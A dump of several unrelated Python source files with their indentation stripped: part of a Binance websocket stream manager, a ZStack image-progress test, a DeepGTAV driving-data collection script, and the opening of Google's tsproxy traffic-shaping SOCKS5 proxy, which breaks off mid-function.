thread_keepalive_streams = threading.Thread(target=self._keepalive_streams)
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
This is going to be the default user_address. Once the websocket is created with this default value, it is not
possible to change it. If you plan to use different user_addresses, it is recommended not to use this method! Just
provide the user_address with create_stream() in the market parameter.
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logger.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
return True
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
return True
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: uuid
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
Set how many received_last_second entries are stored before they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: uuid
"""
self.restart_requests[stream_id] = {'status': "new"}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
Sending more than 8000 chars via websocket.send() leads to a connection loss; 350 list elements is a good limit
to keep the payload length under 8000 chars and to avoid reconnects
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
:param max_items_per_request: max size for params; if there are more items, the payload gets split
:type max_items_per_request: int
:return: list or False
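Example (sketch; assumes a manager instance `ubwa` connected to a CEX exchange):
    payloads = ubwa.split_payload(['btcusdt@trade', 'ethusdt@trade'], "SUBSCRIBE")
    # returns [{'method': 'SUBSCRIBE', 'params': ['btcusdt@trade', 'ethusdt@trade'], 'id': <request_id>}]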
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
if count_items >= max_items_per_request:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
# splitting DEX payloads is not implemented yet
pass
else:
return False
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
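Example (sketch; assumes a manager instance `ubwa`; listens on all interfaces with the default port):
    ubwa.start_monitoring_api(host="0.0.0.0")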
"""
thread = threading.Thread(target=self._start_monitoring_api_thread, args=(host, port, warn_on_update))
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logger.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
# send signal to all threads
self.stop_manager_request = True
# delete listenKeys
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logger.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
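Example (sketch; assumes a manager instance `ubwa` and a created stream):
    if ubwa.stop_stream(stream_id):
        ubwa.wait_till_stream_has_stopped(stream_id)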
"""
# stop a specific stream by stream_id
logger.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logger.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
return True
def stream_is_crashing(self, stream_id, error_msg=False):
"""
If a stream cannot heal itself because of a wrong parameter (wrong market or channel type), it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logger.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
Streams report their shutdown with this call
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logger.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
def subscribe_to_stream(self, stream_id, channels=None, markets=None):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel,
and all subscribed channels are going to get added to the new market!
How the parameters `channels` and `markets` are used with subscriptions is explained in the documentation of
`create_stream() <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
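Example (sketch; assumes a manager instance `ubwa` and a created stream):
    ubwa.subscribe_to_stream(stream_id, channels=['kline_1m'], markets=['btcusdt', 'ethusdt'])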
"""
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if channels is None:
channels = []
if markets is None:
markets = []
try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logger.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logger.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logger.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
Unsubscribe channels and/or markets from an existing stream
If you provide one channel and one market, then all subscribed markets of the specific channel and all
subscribed channels of the specific market are going to be removed!
How the parameters `channels` and `markets` are used with subscriptions is explained in the documentation of
`create_stream() <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
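Example (sketch; assumes a manager instance `ubwa` and a created stream):
    ubwa.unsubscribe_from_stream(stream_id, markets=['ethusdt'])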
"""
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logger.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
Returns `True` as soon as a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon as the stream has received its first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
Returns `True` as soon as a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
test_add_image_progress.py | '''
New Integration test for add image progress.
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.volume_operations as vol_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
import apibinding.inventory as inventory
import threading
import os
import time
_config_ = {
'timeout' : 1800,
'noparallel' : True
}
new_image = None
def add_image(bs_uuid):
global new_image
image_option = test_util.ImageOption()
image_option.set_name('test_add_image_progress')
image_option.set_format('qcow2')
image_option.set_mediaType('RootVolumeTemplate')
image_option.set_url(os.environ.get('imageUrl_net'))
image_option.set_backup_storage_uuid_list([bs_uuid])
new_image = zstack_image_header.ZstackTestImage()
new_image.set_creation_option(image_option)
new_image.add_root_volume_template()
def test():
global new_image
bs_cond = res_ops.gen_query_conditions("status", '=', "Connected")
bss = res_ops.query_resource_fields(res_ops.BACKUP_STORAGE, bs_cond, \
None, fields=['uuid'])
if not bss:
test_util.test_skip("not find available backup storage. Skip test")
if bss[0].type != inventory.CEPH_BACKUP_STORAGE_TYPE:
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bss[0].type != inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
test_util.test_skip("not find available imagestore or ceph backup storage. Skip test")
thread = threading.Thread(target=add_image, args=(bss[0].uuid, ))
thread.start()
time.sleep(5)
image_cond = res_ops.gen_query_conditions("status", '=', "Downloading")
image = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['uuid'])
progress = res_ops.get_task_progress(image[0].uuid)
if int(progress.progress) < 0 or int(progress.progress) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.progress))
thread.join()
new_image.delete()
if test_lib.lib_get_image_delete_policy() != 'Direct':
new_image.expunge()
test_util.test_pass('Add image Progress Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global new_image
if new_image:
new_image.delete()
if test_lib.lib_get_image_delete_policy() != 'Direct':
new_image.expunge()
|
dataset_collect.py | import time
import requests
import multiprocessing
import numpy as np
from deepgtav.messages import Start, Stop, Scenario, Commands, frame2numpy, Dataset
from deepgtav.client import Client
import pickle
i = 100 # dataset number
set_time = 24 # in-game time in the simulator (24-hour clock)
weather = 'EXTRASUNNY' # in-game weather, e.g. it can be rainy, etc.
location = [1243.9920654296875, -1186.1495361328125, 48.48838806152344] # initial vehicle position in the simulator
left = total = right = 0
url = "https://www.pixeldesert.com/compare" # address of the remote controller
txt_position = "../state.config"
tongji_position = "tongji/"+str(i)+".txt" # path of the statistics file (records left/right/total steering counts)
CAP_IMG_W, CAP_IMG_H = 320, 240 # image size of the captured frames in the dataset
rate = 10 # capture rate: how many samples are collected per second
client = None
scenario = None
dataset = Dataset(rate=10,
frame=[CAP_IMG_W,CAP_IMG_H],
throttle=True,
brake=True,
steering=True,
location=True,
drivingMode=True,
speed=True,
time=True)
def state():
while True:
response = requests.request("POST", url)
fo = open(txt_position, "w")
if response.text[1] == '0':
fo.write("0")
elif response.text[1] == '1':
fo.write("1")
fo.close()
time.sleep(2)
def drive():
global message
global left, right, total
message = client.recvMessage()
speed = message['speed']
steering = message['steering']
brake = message['brake']
location = message["location"]
total = total + 1
if steering > 0.1:
right = right+1
elif steering < -0.1:
left = left+1
print(str(speed)+", "+str(steering)+","+str(brake))
print(location)
def main():
global client, scenario
client = Client(ip='localhost', port=8000,datasetPath = 'D:/no_traffic/dataset' + str(i) + '.pz',compressionLevel=9)
scenario = Scenario(weather=weather, vehicle='blista', time=[set_time, 0], drivingMode=-1,
location=location) # dataset storage location and the vehicle model used for data collection
client.sendMessage(Start(scenario=scenario, dataset=dataset))
print("load deepGTAV successfully! \nbegin")
while True:
fo = open(txt_position, "r") # 配置1
txt = fo.read()
fo.close()
if txt == '0':
tongji = open(tongji_position, "w+")
tongji.write("left:"+str(left)+" right:"+str(right)+" total:"+str(total))
tongji.close()
print('=====================end=====================')
exit(0)
elif txt == '1':
drive()
if __name__ == '__main__':
while True:
response = requests.request("POST", url)
if response.text[1] == '1':
fo = open(txt_position, "w")
fo.write("1")
fo.close()
print('$$$$$$$$$$$$$$$$$$$ after 3s will begin $$$$$$$$$$$$$$$$$$$')
countdown = 3 # use a separate variable so the dataset number `i` is not clobbered
while countdown > 0:
print(countdown)
countdown = countdown - 1
time.sleep(1)
print('=====================start now!======================')
break
print("waiting for instructions...")
time.sleep(1)
p1 = multiprocessing.Process(target=state)
p2 = multiprocessing.Process(target=main)
p1.start()
p2.start()
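# Sketch (assumption: DeepGTAV writes the .pz dataset as gzip-compressed pickle
# records): the collected file could later be read back frame by frame, e.g.:
#   import gzip, pickle
#   with gzip.open('D:/no_traffic/dataset100.pz', 'rb') as f:
#       while True:
#           try:
#               sample = pickle.load(f)  # dict with 'frame', 'steering', 'speed', ...
#           except EOFError:
#               break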
|
tsproxy.py | #!/usr/bin/python
"""
Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncore
import gc
import logging
import platform
import Queue
import re
import signal
import socket
import sys
import threading
import time
server = None
in_pipe = None
out_pipe = None
must_exit = False
options = None
dest_addresses = None
connections = {}
dns_cache = {}
port_mappings = None
map_localhost = False
needs_flush = False
flush_pipes = False
last_activity = None
REMOVE_TCP_OVERHEAD = 1460.0 / 1500.0
lock = threading.Lock()
background_activity_count = 0
def PrintMessage(msg):
# Print the message to stdout & flush to make sure that the message is not
# buffered when tsproxy is run as a subprocess.
print >> sys.stdout, msg
sys.stdout.flush()
########################################################################################################################
# Traffic-shaping pipe (applies latency and bandwidth limits)
########################################################################################################################
class TSPipe():
PIPE_IN = 0
PIPE_OUT = 1
def __init__(self, direction, latency, kbps):
self.direction = direction
self.latency = latency
self.kbps = kbps
self.queue = Queue.Queue()
self.last_tick = time.clock()
self.next_message = None
self.available_bytes = .0
self.peer = 'server'
if self.direction == self.PIPE_IN:
self.peer = 'client'
def SendMessage(self, message, main_thread = True):
global connections, in_pipe, out_pipe
message_sent = False
now = time.clock()
if message['message'] == 'closed':
message['time'] = now
else:
message['time'] = time.clock() + self.latency
message['size'] = .0
if 'data' in message:
message['size'] = float(len(message['data']))
try:
connection_id = message['connection']
# Send messages directly, bypassing the queues, if throttling is disabled and we are on the main thread
if main_thread and connection_id in connections and self.peer in connections[connection_id] and self.latency == 0 and self.kbps == .0:
message_sent = self.SendPeerMessage(message)
except:
pass
if not message_sent:
try:
self.queue.put(message)
except:
pass
def SendPeerMessage(self, message):
global last_activity
last_activity = time.clock()
message_sent = False
connection_id = message['connection']
if connection_id in connections:
if self.peer in connections[connection_id]:
try:
connections[connection_id][self.peer].handle_message(message)
message_sent = True
except:
# Clean up any disconnected connections
try:
connections[connection_id]['server'].close()
except:
pass
try:
connections[connection_id]['client'].close()
except:
pass
del connections[connection_id]
return message_sent
def tick(self):
global connections
global flush_pipes
processed_messages = False
now = time.clock()
try:
if self.next_message is None:
self.next_message = self.queue.get_nowait()
# Accumulate bandwidth if an available packet/message was waiting since our last tick
if self.next_message is not None and self.kbps > .0 and self.next_message['time'] <= now:
elapsed = now - self.last_tick
accumulated_bytes = elapsed * self.kbps * 1000.0 / 8.0
self.available_bytes += accumulated_bytes
# process messages as long as the next message is sendable (latency or available bytes)
while (self.next_message is not None) and\
(flush_pipes or ((self.next_message['time'] <= now) and
(self.kbps <= .0 or self.next_message['size'] <= self.available_bytes))):
self.queue.task_done()
processed_messages = True
if self.kbps > .0:
self.available_bytes -= self.next_message['size']
self.SendPeerMessage(self.next_message)
self.next_message = None
self.next_message = self.queue.get_nowait()
except:
pass
# Only accumulate bytes while we have messages that are ready to send
if self.next_message is None or self.next_message['time'] > now:
self.available_bytes = .0
self.last_tick = now
return processed_messages
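# Worked example (sketch): with kbps=5000, a 10 ms gap between ticks accumulates
# 0.010 * 5000 * 1000 / 8 = 6250 bytes of budget, enough to release four queued
# 1460-byte messages (5840 bytes) and carry 410 bytes into the next tick.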
########################################################################################################################
# Threaded DNS resolver
########################################################################################################################
class AsyncDNS(threading.Thread):
def __init__(self, client_id, hostname, port, is_localhost, result_pipe):
threading.Thread.__init__(self)
self.hostname = hostname
self.port = port
self.client_id = client_id
self.is_localhost = is_localhost
self.result_pipe = result_pipe
def run(self):
global lock, background_activity_count
try:
logging.debug('[{0:d}] AsyncDNS - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
addresses = socket.getaddrinfo(self.hostname, self.port)
logging.info('[{0:d}] Resolving {1}:{2:d} Completed'.format(self.client_id, self.hostname, self.port))
except:
addresses = ()
logging.info('[{0:d}] Resolving {1}:{2:d} Failed'.format(self.client_id, self.hostname, self.port))
message = {'message': 'resolved', 'connection': self.client_id, 'addresses': addresses, 'localhost': self.is_localhost}
self.result_pipe.SendMessage(message, False)
lock.acquire()
if background_activity_count > 0:
background_activity_count -= 1
lock.release()
# open and close a local socket which will interrupt the long polling loop to process the message
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# TCP Client
########################################################################################################################
class TCPConnection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_IDLE = 0
STATE_RESOLVING = 1
STATE_CONNECTING = 2
STATE_CONNECTED = 3
def __init__(self, client_id):
global options
asyncore.dispatcher.__init__(self)
self.client_id = client_id
self.state = self.STATE_IDLE
self.buffer = ''
self.addr = None
self.dns_thread = None
self.hostname = None
self.port = None
self.needs_config = True
self.needs_close = False
self.did_resolve = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
in_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']):
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolve':
self.HandleResolve(message)
elif message['message'] == 'connect':
self.HandleConnect(message)
elif message['message'] == 'closed':
if len(self.buffer) == 0:
self.handle_close()
else:
self.needs_close = True
def handle_error(self):
logging.warning('[{0:d}] Error'.format(self.client_id))
if self.state == self.STATE_CONNECTING:
self.SendMessage('connected', {'success': False, 'address': self.addr})
def handle_close(self):
logging.info('[{0:d}] Server Connection Closed'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'server' in connections[self.client_id]:
del connections[self.client_id]['server']
if 'client' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
except:
pass
def handle_connect(self):
if self.state == self.STATE_CONNECTING:
self.state = self.STATE_CONNECTED
self.SendMessage('connected', {'success': True, 'address': self.addr})
logging.info('[{0:d}] Connected'.format(self.client_id))
self.handle_write()
def writable(self):
if self.state == self.STATE_CONNECTING:
return True
return len(self.buffer) > 0
def handle_write(self):
if self.needs_config:
self.needs_config = False
self.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] TCP => {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
self.needs_close = False
self.handle_close()
def handle_read(self):
try:
while True:
data = self.recv(1460)
if data:
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] TCP <= {1:d} byte(s)'.format(self.client_id, len(data)))
self.SendMessage('data', {'data': data})
else:
return
except:
pass
def HandleResolve(self, message):
global in_pipe, map_localhost, lock, background_activity_count
self.did_resolve = True
is_localhost = False
if 'hostname' in message:
self.hostname = message['hostname']
self.port = 0
if 'port' in message:
self.port = message['port']
logging.info('[{0:d}] Resolving {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
if self.hostname == 'localhost':
self.hostname = '127.0.0.1'
if self.hostname == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
logging.info('[{0:d}] Resolving {1}:{2:d} to mapped address {3}'.format(self.client_id, self.hostname, self.port, dest_addresses))
self.SendMessage('resolved', {'addresses': dest_addresses, 'localhost': False})
else:
lock.acquire()
background_activity_count += 1
lock.release()
self.state = self.STATE_RESOLVING
self.dns_thread = AsyncDNS(self.client_id, self.hostname, self.port, is_localhost, in_pipe)
self.dns_thread.start()
def HandleConnect(self, message):
global map_localhost
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
is_localhost = False
if 'localhost' in message:
is_localhost = message['localhost']
elif not self.did_resolve and message['addresses'][0] == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
self.addr = dest_addresses[0]
else:
self.addr = message['addresses'][0]
self.create_socket(self.addr[0], socket.SOCK_STREAM)
addr = self.addr[4][0]
if not is_localhost or map_localhost:
port = GetDestPort(message['port'])
else:
port = message['port']
logging.info('[{0:d}] Connecting to {1}:{2:d}'.format(self.client_id, addr, port))
self.connect((addr, port))
########################################################################################################################
# Socks5 Server
########################################################################################################################
class Socks5Server(asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#self.set_reuse_addr()
self.bind((host, port))
self.listen(socket.SOMAXCONN)
self.ipaddr, self.port = self.getsockname()
self.current_client_id = 0
except:
PrintMessage("Unable to listen on {0}:{1}. Is the port already in use?".format(host, port))
exit(1)
def handle_accept(self):
global connections
pair = self.accept()
if pair is not None:
sock, addr = pair
self.current_client_id += 1
logging.info('[{0:d}] Incoming connection from {1}'.format(self.current_client_id, repr(addr)))
connections[self.current_client_id] = {
'client' : Socks5Connection(sock, self.current_client_id),
'server' : None
}
# Socks5 reference: https://en.wikipedia.org/wiki/SOCKS#SOCKS5
class Socks5Connection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_WAITING_FOR_HANDSHAKE = 0
STATE_WAITING_FOR_CONNECT_REQUEST = 1
STATE_RESOLVING = 2
STATE_CONNECTING = 3
STATE_CONNECTED = 4
def __init__(self, connected_socket, client_id):
global options
asyncore.dispatcher.__init__(self, connected_socket)
self.client_id = client_id
self.state = self.STATE_WAITING_FOR_HANDSHAKE
self.ip = None
self.addresses = None
self.hostname = None
self.port = None
self.requested_address = None
self.buffer = ''
self.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
self.needs_close = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
out_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']) > 0:
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolved':
self.HandleResolved(message)
elif message['message'] == 'connected':
self.HandleConnected(message)
self.handle_write()
elif message['message'] == 'closed':
if len(self.buffer) == 0:
logging.info('[{0:d}] Server connection close being processed, closing Browser connection'.format(self.client_id))
self.handle_close()
else:
logging.info('[{0:d}] Server connection close being processed, queuing browser connection close'.format(self.client_id))
self.needs_close = True
def writable(self):
return len(self.buffer) > 0
def handle_write(self):
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] SOCKS <= {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
logging.info('[{0:d}] queued browser connection close being processed, closing Browser connection'.format(self.client_id))
self.needs_close = False
self.handle_close()
def handle_read(self):
global connections
global dns_cache
try:
while True:
# Consume in up-to packet-sized chunks (TCP packet payload is 1460 bytes of a 1500-byte ethernet frame)
data = self.recv(1460)
if data:
data_len = len(data)
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] SOCKS => {1:d} byte(s)'.format(self.client_id, data_len))
self.SendMessage('data', {'data': data})
elif self.state == self.STATE_WAITING_FOR_HANDSHAKE:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 2 and ord(data[0]) == 0x05:
supports_no_auth = False
auth_count = ord(data[1])
if data_len == auth_count + 2:
for i in range(auth_count):
offset = i + 2
if ord(data[offset]) == 0:
supports_no_auth = True
if supports_no_auth:
# Respond with a message that "No Authentication" was agreed to
logging.info('[{0:d}] New Socks5 client'.format(self.client_id))
response = chr(0x05) + chr(0x00)
self.state = self.STATE_WAITING_FOR_CONNECT_REQUEST
self.buffer += response
self.handle_write()
elif self.state == self.STATE_WAITING_FOR_CONNECT_REQUEST:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 10 and ord(data[0]) == 0x05 and ord(data[2]) == 0x00:
if ord(data[1]) == 0x01: #TCP connection (only supported method for now)
connections[self.client_id]['server'] = TCPConnection(self.client_id)
self.requested_address = data[3:]
port_offset = 0
if ord(data[3]) == 0x01:
port_offset = 8
self.ip = '{0:d}.{1:d}.{2:d}.{3:d}'.format(ord(data[4]), ord(data[5]), ord(data[6]), ord(data[7]))
elif ord(data[3]) == 0x03:
name_len = ord(data[4])
if data_len >= 6 + name_len:
port_offset = 5 + name_len
self.hostname = data[5:5 + name_len]
elif ord(data[3]) == 0x04 and data_len >= 22:
